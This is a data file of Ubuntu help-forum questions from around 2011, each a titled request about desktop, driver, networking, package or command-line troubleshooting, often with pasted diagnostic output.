79981	df -h shows incorrect free space	here is my df-h output . in here /media/songs is using almost 100 % disk space . root @ lab : ~ # df -h filesystem size used avail use % mounted on /dev/sda1 19g 8.7g 9.2g 49 % / udev 1.5g 4.0k 1.5g 1 % /dev tmpfs 596m 960k 595m 1 % /run none 1.5g 1.5m 1.5g 1 % /run/shm /dev/sda7 99g 32g 63g 34 % /media/softs /dev/sda6 99g 90g 3.6g 97 % /media/films /dev/sda8 106g 61g 40g 61 % /media/misc /dev/sda5 99g 94g 4.9m 100 % /media/songs here are the detailed overview of /media/songs . root @ lab : ~ # du -sch /media/songs/* 39g /media/songs/audio 16k /media/songs/lost+found 55g /media/songs/video 93g total root @ lab : ~ # my question is where is the 5gb free space ? in g-parted as well as nautilus it 's showing 5gb free space but available space is only 4.9mb . why ? here are my system details . root @ lab : ~ # lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 11.10 release : 11.10 codename : oneiric root @ lab : ~ # uname -a linux lab 3.0.0-12-generic # 20-ubuntu smp fri oct 7 14:56:25 utc 2011 x86_64 x86_64 x86_64 gnu/linux root @ lab : ~ # df -i filesystem inodes iused ifree iuse % mounted on /dev/sda1 1250928 182541 1068387 15 % / udev 378633 606 378027 1 % /dev tmpfs 381366 563 380803 1 % /run none 381366 9 381357 1 % /run/shm /dev/sda7 6553600 16148 6537452 1 % /media/softs /dev/sda6 6553600 484 6553116 1 % /media/films /dev/sda8 6995968 4287 6991681 1 % /media/misc /dev/sda5 6553600 10857 6542743 1 % /media/songs root @ lab : ~ # tune2fs -l /dev/sda5 tune2fs 1.41.14 ( 22-dec-2010 ) filesystem volume name : songs last mounted on : /media/songs filesystem uuid : 191fe922-ed45-431f-9ae6-4ab1247701d9 filesystem magic number : 0xef53 filesystem revision # : 1 ( dynamic ) filesystem features : has_journal ext_attr resize_inode dir_index filetype needs_recovery extent flex_bg sparse_super large_file huge_file uninit_bg dir_nlink extra_isize filesystem flags : signed_directory_hash default mount options : ( none ) filesystem state : clean errors behavior : continue filesystem os type : linux inode count : 6553600 block count : 26214400 reserved block count : 1310720 free blocks : 1311973 free inodes : 6542744 first block : 0 block size : 4096 fragment size : 4096 reserved gdt blocks : 1017 blocks per group : 32768 fragments per group : 32768 inodes per group : 8192 inode blocks per group : 512 flex block group size : 16 filesystem created : sun jul 17 16:06:42 2011 last mount time : thu nov 17 02:36:00 2011 last write time : thu nov 17 02:36:00 2011 mount count : 1 maximum mount count : 35 last checked : thu nov 17 02:35:20 2011 check interval : 15552000 ( 6 months ) next check after : tue may 15 02:35:20 2012 lifetime writes : 98 gb reserved blocks uid : 0 ( user root ) reserved blocks gid : 0 ( group root ) first inode : 11 inode size : 256 required extra isize : 28 desired extra isize : 28 journal inode : 8 default directory hash : half_md4 directory hash seed : dc98c454-9826-4f42-ad66-3fb7a1941526 journal backup : inode blocks
79983	screen brightness reset to minimum after every reboot	ubuntu 11.10 does n't save my brightness settings between sessions . everytime i boot up , the brightness is always at zero , and i always have to set it back to my preferred setting ( at maximum ) . how can i ensure that my brightness preference will persist after reboot ?
79984	problem with wireless network menu gnome-shell	original title : problema con el menu de redes inalambricas de gnome-shell basic english translatation ( via google translate + edited by hand ) : today i found a problem with the gnome gui shell and i would like to help me solve it , the question is : how i can disconnect from a wireless network using the classic menu of networks ? ( that which is in the top right of the bar ) , for example if i connect a usb wireless card , the network manager detects my internal wireless card and the external but it 's going to automatically connect to the same networks on the two cards and i just want to disconnect from an order not to have conflicts between them , but gnome shell allows me to disable the wireless adapter , but does not work because i 've tried and i am still connected . i do not understand because the shell no longer has the button that said ''off '' . is there any way to revive the ''off '' button in gnome shell or does only unity retain that button ? original hoy me encontré con un problema con la interfaz gráfica gnome shell y me gustaría que me ayuden a resolverlo , la duda es : ¿como puedo desconectarme de una red inalámbrica usando el clásico menú de redes ? ( aquel que se encuentra en la parte superior a la derecha de la barra ) , por ejemplo si conecto una tarjeta inalámbrica usb , el network manager detectará mi tarjeta inalámbrica interna y también el externo pero éste automáticamente me va a conectar a la misma red con las dos tarjetas y lo que quiero es desconectarme de una para así no tener conflictos entre ambas , el gnome shell me permite desactivar el adaptador inalámbrico pero no sirve porque ya lo he probado y sigue conectado , lo que no entiendo porque el gnome shell ya no trae ese botón que decía ''desconectar '' . ¿hay alguna manera de reactivar ese botón ''desconectar '' en gnome shell o solo unity mantiene ese boton ?
79985	hdmi out on asus 1215n ( optimus/ion2 ) not detected	i 'm having trouble with my netbook . ubuntu works fine otherwise except it wo n't recognize my hdmi port . i 've tried ironhide and bumblebee project , and these do enable hardware acceleration , but not the hdmi output . if i search the net all the answers deal with audio over hdmi , but i 'd be happy to get even video at 1080p . as a sidenote , the vga output works but it 's not acceptable since my home tv does n't support hd resolutions over vga . this is why it must be hdmi . ideas , suggestions , logs/configs you need ?
79986	ubuntu one - how to download a complete folder to a windows machine ?	to download ubuntu one files to windows is done one by one . is there a way to download a complete folder ?
79987	how to re-install software center ?	i 've had a problem with software center for a few weeks , where it has just refused to delete a removed ppa from its `` all software '' and `` installed software '' drop-down menus . i 've tried many suggested solutions , none have worked , so i 've finally decided to re-install software center if its possible . how do you do this and is it risky to your computer ( i.e . will re-installing it cause all sorts of issues ) ?
79989	xmodmap is not working properly on resume	since upgrading to 11.10 , xmodmap seems to be working nowhere near as well . i would like to be able to run xmodmap after unlocking a locked screen , as it does n't work . i have to run it from a terminal ( twice ) . i do n't want caps_lock or menu keys after i log in . preferably , i would like xmodmap to go back to being useable . it does n't run automatically at startup anymore like it used to . i have a script at startup that has to run it several times before it actually does things . here is my .xmodmaprc file ; hopefully somebody will be able to find something wrong : clear mod1 clear mod3 clear mod4 clear lock keycode 66 = hyper_l remove lock = hyper_l add mod3 = hyper_l keycode 133 = alt_l add mod1 = alt_l keycode 64 = super_l add mod4 = super_l keycode 135 = super_r add mod4 = super_r keycode 118 = multi_key meanwhile , if fixing this file does n't fix the problems i 'm having , i would like to know how to run xmodmap after resuming from suspend or unlocking from a locked screen .
79994	how to change desktop background to the next/brev background image with mouse right cick menu depending on wallch program ?	i want a script or a tool to change the desktop background using mouse right click menu on the desktop to find in the menu next and previous buttons for the next and past background , but depending on wallch ( i know wallch have quick-list menu ) , just like the right click menu of windows 7 .
79999	how to specifiy prompt location in terminal ?	i am using gnome 3.2 and my problem is that while working on terminal my prompt is usually at the bottom of screen . as gnome notifications keep popping up on new mail , chat or song change , it becomes hard to work at the lowest line of terminal . is there any way i can set prompt location few lines above the last line in the terminal , so that i do n't have to run clear every time ?
80000	how can i automatically connect to unsecured wireless networks ?	how can i make my ubuntu installation automatically connect to in-range unsecured wireless networks ?
80003	which of these services can i safely disable ?	before install stuff on my server i wanted to trim down unnecessary services . etc . here 's the top : 615 ubuntu 20 0 26948 7384 1648 s 0.0 1.2 0:00.39 bash 732 ubuntu 20 0 28188 4144 1032 s 0.5 0.7 0:00.77 screen 811 ubuntu 20 0 23452 3952 1712 s 0.0 0.7 0:00.20 bash 587 root 20 0 73080 3440 2676 s 0.0 0.6 0:00.01 sshd 463 root 20 0 49684 2784 2208 s 0.0 0.5 0:00.00 sshd 1 root 20 0 24052 2132 1316 s 0.0 0.4 0:00.26 init 614 ubuntu 20 0 73080 1560 800 s 0.0 0.3 0:00.23 sshd 469 syslog 20 0 52728 1480 1088 s 0.0 0.2 0:00.06 rsyslogd 1539 ubuntu 20 0 21436 1296 988 r 0.5 0.2 0:00.45 top 713 ubuntu 20 0 25456 1172 936 s 0.0 0.2 0:00.01 screen 223 root 20 0 21320 1148 764 s 0.0 0.2 0:00.03 udevd 480 messageb 20 0 24152 968 700 s 0.0 0.2 0:00.04 dbus-daemon 528 root 20 0 18976 892 696 s 0.0 0.1 0:00.00 cron 307 root 20 0 21316 732 336 s 0.0 0.1 0:00.00 udevd 298 root 20 0 21316 684 304 s 0.0 0.1 0:00.00 udevd 521 root 20 0 4180 640 536 s 0.0 0.1 0:00.00 getty 524 root 20 0 4180 640 536 s 0.0 0.1 0:00.00 getty 220 root 20 0 17096 636 452 s 0.0 0.1 0:00.04 upstart-udev-br 513 root 20 0 4180 636 536 s 0.0 0.1 0:00.00 getty 518 root 20 0 4180 636 536 s 0.0 0.1 0:00.00 getty 522 root 20 0 4180 636 536 s 0.0 0.1 0:00.00 getty 581 root 20 0 4180 636 536 s 0.0 0.1 0:00.00 getty 384 root 20 0 7124 604 120 s 0.0 0.1 0:00.00 dhclient3 339 root 20 0 15048 392 196 s 0.0 0.1 0:00.01 upstart-socket- 529 daemon 20 0 16776 376 220 s 0.0 0.1 0:00.00 atd 2 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kthreadd 3 root 20 0 0 0 0 s 0.0 0.0 0:00.05 ksoftirqd/0 4 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kworker/0:0 5 root 20 0 0 0 0 s 0.0 0.0 0:00.01 kworker/u:0 6 root rt 0 0 0 0 s 0.0 0.0 0:00.00 migration/0 7 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 cpuset 8 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 khelper 9 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 netns 10 root 20 0 0 0 0 s 0.0 0.0 0:00.00 xenwatch 11 root 20 0 0 0 0 s 0.0 0.0 0:00.15 xenbus 12 root 20 0 0 0 0 s 0.0 0.0 0:00.00 sync_supers 13 root 20 0 0 0 0 s 0.0 0.0 0:00.00 bdi-default 14 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kintegrityd 15 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kblockd 16 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 ata_sff 17 root 20 0 0 0 0 s 0.0 0.0 0:00.00 khubd 18 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 md 19 root 20 0 0 0 0 s 0.0 0.0 0:00.00 khungtaskd 20 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kworker/u:1 21 root 20 0 0 0 0 s 0.5 0.0 0:00.11 kworker/0:1 22 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kswapd0 23 root 25 5 0 0 0 s 0.0 0.0 0:00.00 ksmd 24 root 20 0 0 0 0 s 0.0 0.0 0:00.00 fsnotify_mark 25 root 20 0 0 0 0 s 0.0 0.0 0:00.00 ecryptfs-kthrea what can i safely disable and how ?
80004	is slim ( simple login manager ) compatible with 11.10 ?	i have been reading about slim and am wondering if i were to install it in ubuntu 11.10 if it is compatible or if it would cause serious issues ?
80009	display issues when running virtualbox	i have 11.10 installed and it works great . the os sits on a dell xps with nvidia graphics . has anyone run into display flickering when running virtual box on ubuntu ? the display jumps from the last settings ( 1920 ) to 1450 something and it does this repeatedly . this only occurs when running virtual box . it was doing it when running flash videos but i made change the xorg config file to default settings and that has been corrected .
80010	remove windows vista partition so ubuntu fills entire hard drive ?	i created a partition for ubuntu so i could dual-boot windows vista with it . however , windows is no longer necessary and i want ubuntu to take up the entire hard drive . i was wondering how to safely resize the ubuntu ( 11.10 ) partition and take windows out all together , without having to reinstall ubuntu and lose all of the files .
80013	how to pin eclipse to the unity launcher ?	how can i pin eclipse indigo 3.7 i have 'installed ' at /opt/ to the taskbar ? i have tried launching eclipse and right-clicking to choose the 'keep in launcher ' option . but when i click that icon , after closing eclipse , it does n't start eclipse . i have already looked at how do i add eclipse indigo to the launcher ? but no answer worked for me . ( mod note : the answers from this thread are now merged into this one )
80019	nvidia graphics card and 4 monitors	hi i am using a nvidia quadro nvs 420 on a hp desktop . when i put the card in i can see the bios screen but i do not see anything after that . if i put the card in my windows xp computer i get all 4 monitors working . how can i get this graphics card to work with my ubuntu computer . i am using ubuntu 10.04.3 lts btw
80022	i deleted a built-in folder in my home folder . how do i get it back ?	i delete the downloads folder from my home folder . when i create a new folder there called `` downloads '' , it does n't have the proper icon , and it does n't show up in the places sidebar . i tried adding downloads to ~/.config/user-dirs.dirs ( specifically , adding the line xdg_downloads_dir= '' $ home/downloads/ '' ) , but this did n't do anything it seems . how can i get my regular downloads folder back ?
80027	can not enable unity 3d effects on alienware m14x	i have ubuntu 11.10 installed and updated on my alienware m14x . i have the nvidia geforce 555m proprietary driver installed . but still i can not enable the unity 3d effects . please help me with this . i guess its using my sandy bridge graphics unit for rendering the desktop . how do i get it to use my nvidia gpu ?
80028	why is `` connect to server '' bookmarking gone in 11.10 ?	i was previously using 10.10 , and i loved the bookmarking feature of `` connect to server '' . why was that removed ? or is it somewhere else that i 'm not looking ?
80032	can i uninstall caribou without messing up gnome ?	i just installed the gnome tweak tool in order to change my icon theme to faenza , but it seems to have installed some other program named caribou , which i think is an onscreen keyboard program , with it . this is absolutely useless for me , and frankly , i hate the fact that it was installed silently and without my permission . when i go to uninstall it , it says that it 's part of gnome-shell and requires the un-installation of that as well . what do i do ?
80037	login slow after changing settings - how to reset .	it is slow to login after i changed some settings ( i do n't remember what they were ) . how do i reset my user settings in a way that does not delete any applications that i have installed ?
80045	how do i sync apps from two computers	i have a computer with ubuntu 11.10 at school and now my laptop i typically use only at home that i just installed ubuntu 11.10 on to it . how can i get it so that when i install an app on one computer next time i log in and connect to the net it will sync with what apps the other computer has ? i already figured and and set up ubuntu one so that is not an issue , i.e . file sharing .
80051	how can i access my files , similar to windows ' `` my computer '' ?	how could i see my files in ubuntu ? in windows , i see my files in different partition , so in ubuntu can i see files like windows ?
80053	i create office files in `` ms word , powerpoint , access '' can i see my office files in ubuntu ?	i create many office files in ms word . if i install ubuntu can i see my ms word files ?
80062	installing sage	i have installed the sage binaries under ubuntu 10.4 . when i try to run sage i get the following : /opt/sage-4.7.1-linux-64bit-ubuntu_10.04.1_lts-x86_64-linux/local/bin/python : 1 : elf : not found /opt/sage-4.7.1-linux-64bit-ubuntu_10.04.1_lts-x86_64-linux/local/bin/python : 2 : �� ���� : not found /opt/sage-4.7.1-linux-64bit-ubuntu_10.04.1_lts-x86_64-linux/local/bin/python : 2 : ce�� : � 2b���k�������qxj� : not found /opt/sage-4.7.1-linux-64bit-ubuntu_10.04.1_lts-x86_64-linux/local/bin/python : 2 : /opt/sage-4.7.1-linux-64bit-ubuntu_10.04.1_lts-x86_64-linux/local/bin/python : 2 : : not found ���0 : not found /opt/sage-4.7.1-linux-64bit-ubuntu_10.04.1_lts-x86_64-linux/local/bin/python : 2 : � : not found /opt/sage-4.7.1-linux-64bit-ubuntu_10.04.1_lts-x86_64-linux/local/bin/python : 2 : �� @ � : not found /opt/sage-4.7.1-linux-64bit-ubuntu_10.04.1_lts-x86_64-linux/local/bin/python : 2 : : not found /opt/sage-4.7.1-linux-64bit-ubuntu_10.04.1_lts-x86_64-linux/local/bin/python : 2 : h��s���h���5r : not found /opt/sage-4.7.1-linux-64bit-ubuntu_10.04.1_lts-x86_64-linux/local/bin/python : 2 : 8��� : not found /opt/sage-4.7.1-linux-64bit-ubuntu_10.04.1_lts-x86_64-linux/local/bin/python : 1 : syntax error : word unexpected ( expecting `` ) '' ) how can i fix this problem ?
80064	unable to enable wifi on a lenovo b570	i just installed ubuntu 11.10 desktop on my windows 7 laptop ( lenovo b570 ) . wired connection works fine , but i 'm not able to even switch wireless on . as soon as i click the wireless button from off to on , it goes back to off automatically . tried looking online for answers , not able to find anything . any help is appreciated , thank you !
80065	i want to copy a directory from one place to another via the command line	i want to copy a directory from one place to another folder . sudo cp is the command , but after that what should i type ? the destination or source first ?
80067	start a tmuxinator session in gnome-terminal on login	i 'd like to start a tmuxinator session when i login ( gnome on ubuntu lucid ) . i 've tried variations of the following but they all execute and close the terminal window . the following have been given to 'startup applications' sleep 10 ; /usr/bin/gnome-terminal -- execute bash -c 'cd /src/thinit ; exec bundle exec mux start thinit' sleep 10 ; /usr/bin/gnome-terminal -- execute bash -c 'cd /src/thinit ; bundle exec mux start thinit' sleep 10 ; /usr/bin/gnome-terminal -- execute bash -c 'cd /src/thinit ; exec bundle exec mux start thinit ; exec bash' update : this is not an answer , but is getting closer . see hilltop yodeler 's post about 13u11fr09 's suggested solution . the reason this question is not answered is that , afaict , it opens another shell session rather than the keep the initial shell session open . in the use case described that is fine - show help , then provide a shell prompt . whereas here the requirement is to continue to use tmux via the initial shell session launched .
80070	fresh installation without losing /home directory ?	i am running ubuntu 11.10 32bit . i have separate / and /home partitions . i want to go back to ubuntu 10.04 . how can i do this without losing my /home partition . basically i want to save my preferences and all the settings i have saved , my emails accounts and other stuff . i have also setup github and bitbucket setup in this /home partition .
80078	removing jdownloader	i installed jdownloader via jd_unix_0_9.sh . now i want to uninstall it . can anyone tell me how ? i think there should be some option like jd_unix_0_9 -remove to accomplish this .
80083	what 's the regular way to add an admin user ?	i have installed an ubuntu server cloud version on my aws instance . anyway the default user name is specified as ubuntu , and i do n't like it . because i have my own policy for admin account name . so i 'll create a new admin account to manage whole server . how can i add admin user ? there 's a utility for adding normal user , but it 's not applicable for admin users .
80085	how do i uninstall ubuntu ?	how do i format drive and unistall ubuntu 11.10 ? i wanted a dual boot and was given an option to overwrite windows xp partition and said yes . format options do n't work . i tried a few dos prompts and probably not using correct fdisk . format options state drive is busy closed all windows . tried to boot windows xp and disk says its corrupt .
80092	what 's the difference between cat /etc/group and cat /etc/group-	i just changed a group name and noticed that cat /etc/group includes the updated group name , but cat /etc/group- includes the old group name . how are the group and group- files different ?
80094	how to add quicklist to favourite applications in gnome shell	i had a lot of quicklists configured in my unity . but i do not know how to add quicklist to an application in gnome shell . for example , i need an `` enter private browsing '' option under firefox and `` enter incognito mode '' shortcut under chromium browser . any help is appreciated .
80096	notepad++ explorer plugin is not displaying the last character of file name	i have installed notepad++ v5.9.3 and wine v1.3.32 all good except last character of filename ( with separate extension ) or filename/extension is truncated in the explorer panel.. i have un-installed and re-installed wine , as per a similar question but no good . i am a newbie to ubuntu and need assistance to fix this , please ... alanb
80098	how can i get rid of devices and mounted partitions in unity launcher ?	the following used to work : gsettings set com.canonical.unity.devices devices-option `` never '' but after i reinstalled yesterday the devices-option key is gone and so it fails . dconf-editor only shows that the key is not there , but does n't allow me to create one .
80104	where is the uim notification area icon in unity ?	when i was using maverick , it was possible to switch the input method from a uim indicator applet . now that i have upgraded to oneiric , i ca n't seem to switch the input method even when i open uim-im-switcher-gtk . this is necessary for me because i need to be able to switch back and forth between english and tibetan and the keyboard shortcuts do n't seem to work until after i 've changed the input method from the panel first . is there some way to get a uim indicator on the unity panel ? this is a major regression for me and makes it impossible to do certain kinds of work in ubuntu .
80106	how can i mount a synology ds212 ?	i have installed ubuntu 11.10 and want to mount a synology ds212 . i can see the disk station in the file browser ( before mounting with nfs ) but can not open it . i 've tried to mount it with nfs but no success . everything should be right at the synology ( nfs is on and maps are selected ) , and i 've added a line in fstab . if i type sudo mount -a i dont't get an error . when i go to the mounted map i ca n't see anything in it ... .. what is going wrong ? is there maybe a problem with my router ? i hope that someone can help !
80114	need to reconfigure absolute position of dual monitors after reboot , how do i fix that ?	i have two monitors , one is dell p2411h 24â and the other is benq fp91g+ 19 '' . all the times when i restart the pc i have to reconfigure the absolute position . how can i fix that ?
80115	how to remove a user from a group ?	i added a user account to the admin group and discovered i added wrong user . so i now have to remove the account from the admin group . how can i remove an account from a group without deleting the user ?
80121	525 m nvidia grapic card is not work in linux	i have dell dell inspiron 15r and company give the windows 7 64 bit os . i have 1gb 525m nvidia graphic card which work in windows very well but when i install the ubuntu 10.10 then graphic card is not work . ubuntu 10.10 give that message that i have nvidia graphic card which not active you want to active . when i say ok then its download driver from the net and then install it when restart computer then graphic terminal is not working other terminal is work well . i have not idea why that happen plz help me ?
80123	after installing libreoffice-gnome libreoffice not visible in alt+tab-switcher	after installing libreoffice-gnome when i run libreoffice i can not switch to it 's windows via alt+tab because they are not accesible via that switcher . i am running ubuntu 11.10 32-bit and was able to reproduce this behaviour . thanks for any suggestions
80125	where is sphinx located after i install it ?	i have to install sphinx on my ubuntu 11.10 for it to work on a ruby app . i managed to install it through synaptics , however when i run my sphinx ( rake ts : rebuild ) i get an error message saying : sphinx can not be found on your system . you may need to configure the following settings in your config/sphinx.yml file : * bin_path * searchd_binary_name * indexer_binary_name i guess i just need to edit the sphinx.yml file with the right info but hey , i ca n't seem to find out where sphinx is . any help ?
80126	controlling root access	i have some sensitive data and i dont want to share with the root user . as fa as i know the root users can read and modify everything . my question is how can i protect this data . i do n't want to give access to the root users to this folder/file .
80128	using .deb packages in /var/cache/apt/archives	i found all-deb-packages after downloading in /var/cache/apt/archives.and i am unable to use them on other systems . for cheese software i found '' cheese_3.2.0-0ubuntu2_i386.deb '' and '' cheese-common_3.2.0-0ubuntu2_all.deb '' . i ran both the packages in my friend 's laptop and both do not install cheese . how to use these packages ? ?
80129	how do i get the minimize , maximize and close buttons to the left in gnome shell ?	when i try to move them to the left the minimize and the maximize buttons disappear and the only the close button moves to the left .
80133	why is the cache in my memory always full ?	i have 6gb ram , i5 2.4ghz processor running ubuntu 11.10 . i partitioned my hd so that i have 8gb swap . when streaming online or opening several tabs in chromium i soon have 4gb memory in the cache . and i think this makes my notebook slow . when streaming a video , after a few minutes it really slows down and stumbles/jerks . what could the problem be ? how can i solve this ? p.s : initially i had 4gb and recently upgraded to 6gb , but i did not experience a significant change . p.p.s : free -g in the terminal prints this : total used free shared buffers cached mem : 5 2 3 0 0 0 -/+ buffers/cache : 1 4 swap : 8 0 8
80135	crashes while playing mp3 songs	i have downloaded and installed ubuntu last month while downloading codecs for playing music and video formats my laptop ( dell xps ) crashed . later i again started the system now the problems i face are 1 ) after signing in as user/admin the wallpaper loads while all other windows disappear no ui ( task bar and dock ) is displayed even after say 30 min . 2 ) i uninstalled and reinstalled ubuntu hence there were no problems but when i play music files the laptop crashes and the same sequence as above follows this has happened for last 6 times . 3 ) whenever the ui disaapears after logging in the hard disk starts to heat up and there is considerable increase in power usage of the system . where in the power drain is notable . please suggest any changes or rectify the issue . regards sid
80136	why ca n't i alt+tab to empathy ?	i 'm running ubuntu 11.10 and using unity . i have a bunch of applications open , including empathy . when i hit alt+tab i can switch between all of the applications , and the `` show desktop '' option , but not empathy . ( when i 'm alt+tabbing i do n't see an icon for empathy . ) how can i alt+tab to empathy ? ( if i do shift+alt+up_arrow ( expo for current desktop ) i can see empathy and select it by clicking on it . )
80138	problem with vnc viewer	i am facing a problem with vnc viewer . for example i have a taken a system remotely using vncviewer . and if i type something in the text editor of the remote desktop few characters are not getting typed , instead it acts like a shortcut key for some actione . i.e if i press m in text editor of the remote desktop , the screen gets minimized and i am unable to type the character m. can someone give me a solution ? to get rid of this problem . thanks in advance . note : am using vncviewer in natty 11.04 .
80142	remove unwanted shortcut gnome classic	on ubuntu 11.10 using gnome classic i accidently made an error and now i have to deal with a redirect button to the gnome tweak tool in the top bar of the gnome interface , right next to the locations button . ( but can be moved accros the top bar ) i do n't want and ca n't delete the button . is there a solution to get rid of it ?
80143	bind gnome-shell activities overview to custom mouse button	i have a logitech g500 mouse which has a third button between the usual `` backward '' and `` forward '' mouse buttons . i want to bind the gnome-shell activies overview to that button button . i tried to do that in the keyboard settings where under `` system '' the action `` show the activities overview '' is available , but when i press the mouse button it remains `` disabled '' .
80144	where can i find the ubuntu wiki theme ?	does anyone know where i can get hold of the source code to ubuntu 's current mediawiki theme , 'light ' ? there do n't appear to be any links under the artwork and themes section of the wiki itself .
80145	how can i lock screen on lxde	like gnome control + alt + l in lxde how can i do that ? what i have to intall to do this ? thanks -- searching for a solution on my own but ... ok if i do alt+f2 and type xscreensaver-command -lock that 's a small solution . tryed to do an small script but it 's not working.. this is what i do vi lock.sh # ! /bin/bash xscreensaver-command -lock exit 0 chmod +x lock.sh but this doesnt work.. ideas ?
80160	how to get the old menu in ubuntu 11.10	i recently upgraded to 11.10 from 10.04 . after the upgrade , the menu is shifted to the top column , which is pretty annoying . i would prefer the old version where the menu is attached to the window itself . any idea how to get it . thanks
80164	comparison : octave , spyder , freemat , scilab - as alternatives for matlab	i am trying to find an alternative for matlab and have so far found : octave spyder freemat scilab i 'm trying to find which is the best alternative to matlab . i 'm particularly concerned with performance and the integrity of the results .
80171	how can i upload to google music via a proxy ?	i installed the google music manager and it works fine without a proxy . however i have a proxy set in ubuntu and it is unable to connect to upload . however , it is able to log in just fine . has anyone managed to upload music to google using the music manager on ubuntu via a proxy ? i have already tried various combinations of the environment variables http_proxy , all_proxy and http_proxy and nothing seems to work
80172	wrong browser user agent	i just finished installed ubuntu 11.04 . when i point my web browser to http : //whatsmyuseragent.com/ , then it reports my user agent as : mozilla/4.0 ( compatible ; msie 5.5 ; windows 98 ) i get the same results with firefox 4.0/7.0/8.0 & chromium 14 & konqueror which leads me to believe that it is an os issue , rather than a browser specific issue i have tried firefox user agent switcher , did n't work i have tried specifying the user agent setting when launching chrome , that did n't work either i suspect it is because those extensions / options alters the browsers user agent settings in javascript and not the underlying header that the browser sends . see http : //browserspy.dk/useragent.php for the 2 different user agents . anybody have idea any ideas how i can update it ? firebug says : host : whatsmyuseragent.com user-agent : mozilla/5.0 ( x11 ; linux i686 ; rv:8.0 ) gecko/20100101 firefox/8.0 accept : text/html , application/xhtml+xml , application/xml ; q=0.9 , / ; q=0.8 accept-language : en-us accept-encoding : gzip , deflate accept-charset : iso-8859-1 , utf-8 ; q=0.7 , * ; q=0.7 proxy-connection : keep-alive proxy-authorization : basic hello bob
80178	change faenza-radiance default empathy icons	i really like faenza icons and i use radiance as gtk theme , but the problem is faenza-radiance icons for empathy are really annoying ! i want to change empathy icons of faenza-radiance to look like faenza-dark 's icons faenza-radiance : faenza-dark :
80190	ca n't install banshee	this is what i get when i try to install banshee : sudo apt-get install banshee reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : banshee : depends : libdbus-glib1.0-cil ( > = 0.5 ) but it is not installable depends : libdbus1.0-cil ( > = 0.7 ) but it is not installable recommends : banshee-extension-soundmenu ( = 2.3.1+git20111114.r1.aea7412-0ubuntu1+maverick ) but it is not going to be installed e : broken packages i tried to search for `` how to fix broken packages '' posts , but none of them helped . what do i do to fix this ?
80192	how i can install a package . deb without internet connection in the terminal ?	i have no internet connection and i can install the packages . deb that i downloaded from internet that are older versions but i can not install anything and not as the terminal
80194	where do i put my start up script for mysql ?	i have created a second instance of mysql on the server for replication , if i start the process manually it works but need it to start at bootup . i used to just do a bash script in the init.d folder but apparently that no longer works on 11.10 can anyone point me in the right direction ? i even copied the mysql service , changed it and tried that but it refused to work . p.s it is the server edition so only shell access .
80196	terminal emulator with different background color per instance	i often have to keep multiple ssh sessions open in different terminal windows at the same time and i 'd like to have a differen background color to help me visualize to which host i 'm connected to : i.e . red when i 'm root @ live-system . i tried configuring xfce terminal but the setting is not wi do you know any terminal emulator that allows me to do that ? i 'd prefer something that does not depend on kde libraries .
80199	transform .odt document into pdf compatible with adobe reader 5 with embedded fonts	i need to create pdfs out of .odt documents , for submission on an online application website . it is required that the pdfs be `` compatible with adobe acrobat reader version 5 or higher , with embedded fonts '' . do pdfs created with libreoffice satisfy these requirements ? i am using ubuntu 11.10 , lo 3.4.3 . the font is times new roman ( but i can change that to a free font if that 's a problem ) . if not , what other method is recommended ?
80205	is there a way to enable ubuntu keyboard shortcuts in kubuntu ?	i like to have default ubuntu shortcuts available in my kubuntu , but i do n't want to assign them all manually , i mean a way to import them from ubuntu . for example i want ^+meta+t which opens the terminal or ^+meta+numpad to resize windows .
80209	there is no on button showing in gnome shell extension	how to enable gnome shell extension ? . when i click on gnome shell extension there is no on button showing advanced settings -- > shell extensions . in a youtube video i saw there is one on button to enable shell extensions . i have allready installed gnome tweak tool and everything.. i have want to use user themes for gnome shell , but i am having troubles . i installed the user theme extension , but it does n't appear to show up under the gnome tweak tool . to confirm that i have the user themes extension installed , here is the feedback i get when i try to install it through terminal again :
80211	process id using ps aux	i 'm a newbie to shell programming . assuming that i 've started a program ( eg netbeans ) from my terminal , if i type ps aux|grep netbeans i get the the output pre 18775 1.2 0.0 12524 1972 pts/3 s 20:17 0:00 where 18775 specifies the pid etc of the process . then i kill it using kill 18775. upon which the netbeans ui disappears . if i try to get the pid by using the first command , i still get : pre 19137 0.0 0.0 9136 1068 pts/3 s+ 20:19 0:00 grep -- color=auto netbeans if the process has been killed , why does it still show the above output ?
80214	ubuntu 11.10 launcher missing icon	i download eclipse , uncompressed it in my home folder , launched the application , and selected to keep the application in the launcher . however , the eclipse icon is not being displayed . i 'm assuming because it is not technically an installed application . how can i add an icon for an application in the launcher ( ubuntu 11.10 ) ? thanks .
80222	sound coming out of speakers and headphones on an asus k50ab	i have asus k50ab with ubuntu 11.10 . when i plug in headphones , sound is coming out of the speakers as well . i cant solve this for long time and i tried lot of stuff that i find on google .
80224	does grub2 require an optional scsi feature ?	i was told that the scsi mode page commands that provide serial numbers are an optional feature . is this true ? grub2 most definitely fails to function on disks that do not provide serial numbers . see lp : # 604335 for details . the key issue is that while the /usr/bin/grub-install script does not look at /dev/disk/by-id/* files , the code that running `` sudo dpkg-reconfigure grub-pc '' executes looks for only disks that provide serial numbers by using the contents of /dev/disk/by-id/* as the source of information . one of the critical aspects of this is that vmware fusion /dev/sda emulated disks fail to provide serial numbers ( comment # 44 in lp : # 604335 above ) so they fail with grub-pc . how many non-virtual disks do not implement serial numbers and therefore can not be used with grub2 correctly ?
80225	how to grep whole manual ?	i can do for example man cp | grep verbose to findout if cp man has word `` verbose '' , how can i do something like ( pseudo-code ) man * | grep copy to find out what command to use for coping ?
